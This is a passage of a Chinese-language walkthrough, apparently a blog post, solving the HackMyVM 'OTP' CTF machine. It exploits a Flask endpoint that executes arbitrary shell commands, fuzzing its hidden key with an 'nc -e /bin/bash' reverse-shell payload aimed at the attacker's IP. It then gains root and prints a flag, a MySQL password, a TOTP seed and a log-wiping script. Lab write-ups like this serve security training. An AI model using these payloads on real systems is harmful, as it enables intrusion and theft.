\nZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbiwgVGltZW91dEV4cGlyZWQsIFBJUEUKZnJvbSBmbGFzayBpbXBvcnQgRmxhc2ssIGpzb25pZnksIGFib3J0LCByZXF1ZXN0CgphcHAgPSBGbGFzayhfX25hbWVfXykKCkBhcHAucm91dGUoIi8iLCBtZXRob2RzPVsiIl0pCmRlZiBpbmRleCgpOgogICAgcmVxX2pzb24gPSByZXF1ZXN0LmdldF9qc29uKCkKICAgIGlmIHJlcV9qc29uIGlzIE5vbmUgb3IgIiIgbm90IGluIHJlcV9qc29uOgogICAgICAgIGFib3J0KDQwMCwgZGVzY3JpcHRpb249IlBsZWFzZSBwcm92aWRlIGNvbW1hbmQgaW4gSlNPTiByZXF1ZXN0ISIpCiAgICBwcm9jID0gUG9wZW4ocmVxX2pzb25bIiJdLCBzdGRvdXQ9UElQRSwgc3RkZXJyPVBJUEUsIHNoZWxsPVRydWUpCiAgICB0cnk6CiAgICAgICAgb3V0cywgZXJycyA9IHByb2MuY29tbXVuaWNhdGUodGltZW91dD0xKQogICAgZXhjZXB0IFRpbWVvdXRFeHBpcmVkOgogICAgICAgIHByb2Mua2lsbCgpCiAgICAgICAgYWJvcnQoNTAwLCBkZXNjcmlwdGlvbj0iVGhlIHRpbWVvdXQgaXMgZXhwaXJlZCEiKQogICAgaWYgZXJyczoKICAgICAgICBhYm9ydCg1MDAsIGRlc2NyaXB0aW9uPWVycnMuZGVjb2RlKCd1dGYtOCcpKQogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1UcnVlLCBtZXNzYWdlPW91dHMuZGVjb2RlKCd1dGYtOCcpKQoKQGFwcC5lcnJvcmhhbmRsZXIoNDAwKQpkZWYgYmFkX3JlcXVlc3QoZXJyb3IpOgogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1GYWxzZSwgbWVzc2FnZT1lcnJvci5kZXNjcmlwdGlvbiksIDQwMAoKQGFwcC5lcnJvcmhhbmRsZXIoNTAwKQpkZWYgc2VydmVyX2Vycm9yKGVycm9yKToKICAgIHJldHVybiBqc29uaWZ5KHN1Y2Nlc3M9RmFsc2UsIG1lc3NhZ2U9ZXJyb3IuZGVzY3JpcHRpb24pICwgNTAw \n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ curl -s http:\/\/$IP:1234\/SourceCode | base64 -d \nfrom subprocess import Popen, TimeoutExpired, PIPE\nfrom flask import Flask, jsonify, abort, request\n\napp = Flask(__name__)\n\n@app.route(&quot;\/&quot;, methods=[&quot;&quot;])\ndef index():\n    req_json = request.get_json()\n    if req_json is None or &quot;&quot; not in req_json:\n        abort(400, description=&quot;Please provide command in JSON request!&quot;)\n    proc = Popen(req_json[&quot;&quot;], stdout=PIPE, stderr=PIPE, shell=True)\n    try:\n        outs, errs = proc.communicate(timeout=1)\n    except TimeoutExpired:\n        proc.kill()\n        abort(500, description=&quot;The timeout is expired!&quot;)\n    if errs:\n        
abort(500, description=errs.decode(&#039;utf-8&#039;))\n    return jsonify(success=True, message=outs.decode(&#039;utf-8&#039;))\n\n@app.errorhandler(400)\ndef bad_request(error):\n    return jsonify(success=False, message=error.description), 400\n\n@app.errorhandler(500)\ndef server_error(error):\n    return jsonify(success=False, message=error.description) , 500 <\/code><\/pre>\n<h3>FUZZ<\/h3>\n<p>\u8bf4\u660e\u53ef\u4ee5\u63d0\u4ea4<code>json<\/code>\u6267\u884c\u547d\u4ee4\uff0c\u4f46<code>\/SourceCode<\/code>\u8fd4\u56de\u7684\u6e90\u7801\u91cc\u952e\u540d\u88ab\u9690\u53bb\u4e86\uff08\u9690\u85cf\u952e\u540d\u5e76\u4e0d\u7b49\u4e8e\u9274\u6743\uff0c\u8fd9\u4e2a\u63a5\u53e3\u5b9e\u9645\u662f\u4ee5root\u8eab\u4efd\u6267\u884c\u4efb\u610f\u547d\u4ee4\uff09\uff0c\u5c1d\u8bd5\u8bbe\u7acb\u76d1\u542c\u7136\u540efuzz\u4e00\u4e0b\u952e\u540d\uff0c\u7528\u524d\u9762\u5f97\u5230\u7684\u5217\u8868\u4f5c\u4e3a\u5b57\u5178\u8fdb\u884c\u626b\u63cf\uff1a<\/p>\n<p>\u989d\uff0c\u5230\u8fd9\u91cc\u6211\u865a\u62df\u673a\u5c45\u7136\u6b7b\u673a\u4e86\u3002\u3002\u3002\u3002\u3002\u91cd\u542f\u4ee5\u540e\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ echo &quot;Adroit\\nAgain\\nAlzheimer\\nAttack\\nBah\\nBaseME\\nBeloved\\nBlackWidow\\nBrain\\nBreakout\\nBroken\\nBunny\\nCelebritySoup\\nCeres\\nChoc\\nChronos\\nClover\\nCondor\\nConfusion\\nConnection\\nController\\nCrossroads\\nDance\\nDeba\\nDemons\\nDevguru\\nDiophante\\nDoc\\nDominator\\nDoubletrouble\\nDriftingblues3\\nDriftingblues5\\nDriftingblues6\\nDriftingblues7\\nDriftingblues8\\nDriftingblues9\\nDrippingblues\\nEchoed\\nEighty\\nEmma\\nEyes\\nFamily\\nFamily2\\nFaust\\nFive\\nFlower\\nForbidden\\nGift\\nGigachad\\nGinger\\nGovernment\\nGrotesque\\nGrotesque2\\nGrotesque3\\nHacked\\nHash\\nHat\\nHelium\\nHidden\\nHomage\\nHommie\\nHopper\\nHundred\\nIcarus\\nInsomnia\\nIsengard\\nKeys\\nKlim\\nLearn2Code\\nLevel\\nLight\\nLisa\\nListen\\nLocker\\nLupinone\\nMay\\nMemories\\nMessedUP\\nMethod\\nMilk\\nMomentum\\nMomentum2\\nMoosage\\nNarcos\\nNeobank\\nNightfall\\nNoob\\nNowords\\nNumber\\nOrasi\\nOtte\\nPickle\\nPwned\\nRandom\\nRipper\\nRubies\\nSatori\\nSedem\\nServe\\nShop\\nSoul\\nSpeed\\nStagiaire\\nStars\\nsuidy\\nSuidyRevenge\\nSuperhuman\\nSuuk\\n
Sysadmin\\nT800\\nTalk\\nTaurus\\nTexte\\nTheFool\\nTitan\\nTom\\nTornado\\nTranquil\\nTron\\nTroya\\nTwisted\\nUnbakedPie\\nVideoclub\\nVisions\\nVulny\\nWarez\\nWebmaster\\nWinter\\nZday\\nZen&quot; &gt; ff\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/$IP:1234 -X PUT -H &#039;Content-Type: application\/json&#039; -d &#039;{&quot;FUZZ&quot;: &quot;nc -e \/bin\/bash 192.168.0.143 2345&quot;}&#039; -w .\/ff\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : PUT\n :: URL              : http:\/\/:1234\n :: Wordlist         : FUZZ: \/home\/kali\/temp\/otp\/ff\n :: Header           : Content-Type: application\/json\n :: Data             : {&quot;FUZZ&quot;: &quot;nc -e \/bin\/bash 192.168.0.143 2345&quot;}\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\n:: Progress: [130\/130] :: Job [1\/1] :: 0 req\/sec :: Duration: [0:00:00] :: Errors: 130 ::<\/code><\/pre>\n<p>\u548b\u6ca1\u6210\u529f\uff0c\u770b\u4e00\u4e0b\u662f\u4e0d\u662f\u54ea\u51fa\u9519\u4e86\u3002\u3002\u3002\u3002\u91cd\u542f\u4ee5\u540eIP\u6ca1\u6709\u8bbe\u7f6e\u3002\u3002\u3002\u3002\u8fd9\u4e2a\u662f\u4e34\u65f6\u7684\u3002\u3002\u3002<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp]\n\u2514\u2500$ ffuf -u http:\/\/192.168.0.107:1234 -X PUT -H &#039;Content-Type: application\/json&#039; -d 
&#039;{&quot;FUZZ&quot;: &quot;nc -e \/bin\/bash 192.168.0.143 2345&quot;}&#039; -w .\/ff\n\n        \/&#039;___\\  \/&#039;___\\           \/&#039;___\\       \n       \/\\ \\__\/ \/\\ \\__\/  __  __  \/\\ \\__\/       \n       \\ \\ ,__\\\\ \\ ,__\\\/\\ \\\/\\ \\ \\ \\ ,__\\      \n        \\ \\ \\_\/ \\ \\ \\_\/\\ \\ \\_\\ \\ \\ \\ \\_\/      \n         \\ \\_\\   \\ \\_\\  \\ \\____\/  \\ \\_\\       \n          \\\/_\/    \\\/_\/   \\\/___\/    \\\/_\/       \n\n       v2.1.0-dev\n________________________________________________\n\n :: Method           : PUT\n :: URL              : http:\/\/192.168.0.107:1234\n :: Wordlist         : FUZZ: \/home\/kali\/temp\/otp\/ff\n :: Header           : Content-Type: application\/json\n :: Data             : {&quot;FUZZ&quot;: &quot;nc -e \/bin\/bash 192.168.0.143 2345&quot;}\n :: Follow redirects : false\n :: Calibration      : false\n :: Timeout          : 10\n :: Threads          : 40\n :: Matcher          : Response status: 200-299,301,302,307,401,403,405,500\n________________________________________________\n\nVisions                 [Status: 500, Size: 54, Words: 4, Lines: 2, Duration: 1161ms]\n:: Progress: [130\/130] :: Job [1\/1] :: 83 req\/sec :: Duration: [0:00:01] :: Errors: 0 ::<\/code><\/pre>\n<p>\u53d1\u73b0shell\u5df2\u7ecf\u5f39\u8fc7\u6765\u4e86\uff01<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817539.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407121817539.png\" 
src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240712181547338\" style=\"zoom:50%;\" \/><\/div><\/p>\n<pre><code class=\"language-bash\">(remote) root@otp:\/root# ls -la\ntotal 40\ndrwx------  3 root  root  4096 Jul 12 05:01 .\ndrwxr-xr-x 18 root  root  4096 Nov 17  2021 ..\n-r--------  1 root  root  2307 Nov 22  2021 app.py\nlrwxrwxrwx  1 root  root     9 Nov 22  2021 .bash_history -&gt; \/dev\/null\n-rw-r--r--  1 root  root  3526 Nov 17  2021 .bashrc\n-rwx------  1 david david   61 Nov 23  2021 .chmod\n-rwx------  1 root  root    33 Nov 22  2021 flag_r00t.txt\n---x------  1 root  root    56 Nov 22  2021 localhost.sh\n-rw-r--r--  1 root  root   161 Jul  9  2019 .profile\ndrwxr-xr-x  2 root  root  4096 Jul 12 05:01 __pycache__\n-rwxr-xr-x  1 root  root   354 Nov 23  2021 update.sh\n(remote) root@otp:\/root# cat flag_r00t.txt \n8a2d55707a9084982649dadc04b426a0\n(remote) root@otp:\/root# cat update.sh \n#!\/bin\/bash\n\nwhile :\ndo\n        \/usr\/bin\/mysql -u hacker -p&#039;#4ck!ng!s!nMybl0od&#039; -D otp -e &quot;UPDATE creds SET totp = $(oathtool --totp -b NYZXMM3SI4YG43RUI4QXMM3ZGBKXKUAK) WHERE id=2&quot;\n\n        \/usr\/bin\/echo &quot; &quot; &gt;\/var\/log\/auth.log\n        \/usr\/bin\/echo &quot; &quot; &gt;\/var\/log\/vsftpd.log\n        \/usr\/bin\/echo &quot; &quot; &gt;\/var\/log\/apache2\/access.log\n        \/usr\/bin\/echo &quot; &quot; &gt;\/var\/log\/apache2\/error.log\ndone\n(remote) root@otp:\/root# cat localhost.sh \n#!\/bin\/bash\n\ncd \/root\/ &amp;&amp; \/usr\/bin\/python3 -m flask run\n(remote) root@otp:\/root# cat .chmod \n#!\/bin\/bash\n\n\/usr\/bin\/chmod 777 \/var\/www\/otp\/argon\/u9l04d_\/*\n(remote) root@otp:\/root# cat app.py \n# https:\/\/stackoverflow.com\/questions\/57104398\/python-flask-how-to-run-subprocess-pass-a-command\/57104633#57104633\nfrom subprocess import 
Popen, TimeoutExpired, PIPE\nfrom flask import Flask, jsonify, abort, request\n\napp = Flask(__name__)\n\n@app.route(&quot;\/&quot;, methods=[&quot;PUT&quot;])\ndef index():\n    req_json = request.get_json()\n    if req_json is None or &quot;Visions&quot; not in req_json:\n        abort(400, description=&quot;Provide command in JSON request!&quot;)\n    proc = Popen(req_json[&quot;Visions&quot;], stdout=PIPE, stderr=PIPE, shell=True)\n    try:\n        outs, errs = proc.communicate(timeout=1)\n    except TimeoutExpired:\n        proc.kill()\n        abort(500, description=&quot;The timeout is expired!&quot;)\n    if errs:\n        abort(500, description=errs.decode(&#039;utf-8&#039;))\n    return jsonify(success=True, message=outs.decode(&#039;utf-8&#039;))\n\n@app.errorhandler(400)\ndef bad_request(error):\n    return jsonify(success=False, message=error.description), 400\n\n@app.errorhandler(500)\ndef server_error(error):\n    return jsonify(success=False, message=error.description) , 500\n\n@app.route(&quot;\/SourceCode&quot;)\ndef code():\n    return 
&quot;ZnJvbSBzdWJwcm9jZXNzIGltcG9ydCBQb3BlbiwgVGltZW91dEV4cGlyZWQsIFBJUEUKZnJvbSBmbGFzayBpbXBvcnQgRmxhc2ssIGpzb25pZnksIGFib3J0LCByZXF1ZXN0CgphcHAgPSBGbGFzayhfX25hbWVfXykKCkBhcHAucm91dGUoIi8iLCBtZXRob2RzPVsiIl0pCmRlZiBpbmRleCgpOgogICAgcmVxX2pzb24gPSByZXF1ZXN0LmdldF9qc29uKCkKICAgIGlmIHJlcV9qc29uIGlzIE5vbmUgb3IgIiIgbm90IGluIHJlcV9qc29uOgogICAgICAgIGFib3J0KDQwMCwgZGVzY3JpcHRpb249IlBsZWFzZSBwcm92aWRlIGNvbW1hbmQgaW4gSlNPTiByZXF1ZXN0ISIpCiAgICBwcm9jID0gUG9wZW4ocmVxX2pzb25bIiJdLCBzdGRvdXQ9UElQRSwgc3RkZXJyPVBJUEUsIHNoZWxsPVRydWUpCiAgICB0cnk6CiAgICAgICAgb3V0cywgZXJycyA9IHByb2MuY29tbXVuaWNhdGUodGltZW91dD0xKQogICAgZXhjZXB0IFRpbWVvdXRFeHBpcmVkOgogICAgICAgIHByb2Mua2lsbCgpCiAgICAgICAgYWJvcnQoNTAwLCBkZXNjcmlwdGlvbj0iVGhlIHRpbWVvdXQgaXMgZXhwaXJlZCEiKQogICAgaWYgZXJyczoKICAgICAgICBhYm9ydCg1MDAsIGRlc2NyaXB0aW9uPWVycnMuZGVjb2RlKCd1dGYtOCcpKQogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1UcnVlLCBtZXNzYWdlPW91dHMuZGVjb2RlKCd1dGYtOCcpKQoKQGFwcC5lcnJvcmhhbmRsZXIoNDAwKQpkZWYgYmFkX3JlcXVlc3QoZXJyb3IpOgogICAgcmV0dXJuIGpzb25pZnkoc3VjY2Vzcz1GYWxzZSwgbWVzc2FnZT1lcnJvci5kZXNjcmlwdGlvbiksIDQwMAoKQGFwcC5lcnJvcmhhbmRsZXIoNTAwKQpkZWYgc2VydmVyX2Vycm9yKGVycm9yKToKICAgIHJldHVybiBqc29uaWZ5KHN1Y2Nlc3M9RmFsc2UsIG1lc3NhZ2U9ZXJyb3IuZGVzY3JpcHRpb24pICwgNTAw&quot;<\/code><\/pre>\n<h2>\u53c2\u8003<\/h2>\n<p><a href=\"https:\/\/www.bilibili.com\/video\/BV1nx4y1U7He\/\">https:\/\/www.bilibili.com\/video\/BV1nx4y1U7He\/<\/a><\/p>\n<p><a href=\"https:\/\/mp.weixin.qq.com\/s?__biz=MzAwMjczNDMyNw==&amp;mid=2648180554&amp;idx=1&amp;sn=f97e8673cab56ebc40f2352beb4fd547&amp;chksm=82e946d2b59ecfc499d4e8cd2e6d55eab098b0a14fa1a3000175fcdf9f1e42dc80cce1011728&amp;token=1286188854&amp;lang=zh_CN#rd\">https:\/\/mp.weixin.qq.com\/s?__biz=MzAwMjczNDMyNw==&mid=2648180554&idx=1&sn=f97e8673cab56ebc40f2352beb4fd547&chksm=82e946d2b59ecfc499d4e8cd2e6d55eab098b0a14fa1a3000175fcdf9f1e42dc80cce1011728&token=1286188854&lang=zh_CN#rd<\/a><\/p>\n<p><a 
href=\"https:\/\/nepcodex.com\/2021\/12\/otp-writeup-hackmyvm-walkthrough\/\">https:\/\/nepcodex.com\/2021\/12\/otp-writeup-hackmyvm-walkthrough\/<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>OTP \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/otp] \u2514\u2500$ rustscan  [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,24,18],"tags":[],"class_list":["post-758","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-penetration-test","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/758","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=758"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/758\/revisions"}],"predecessor-version":[{"id":759,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/758\/revisions\/759"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=758"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=758"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=758"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}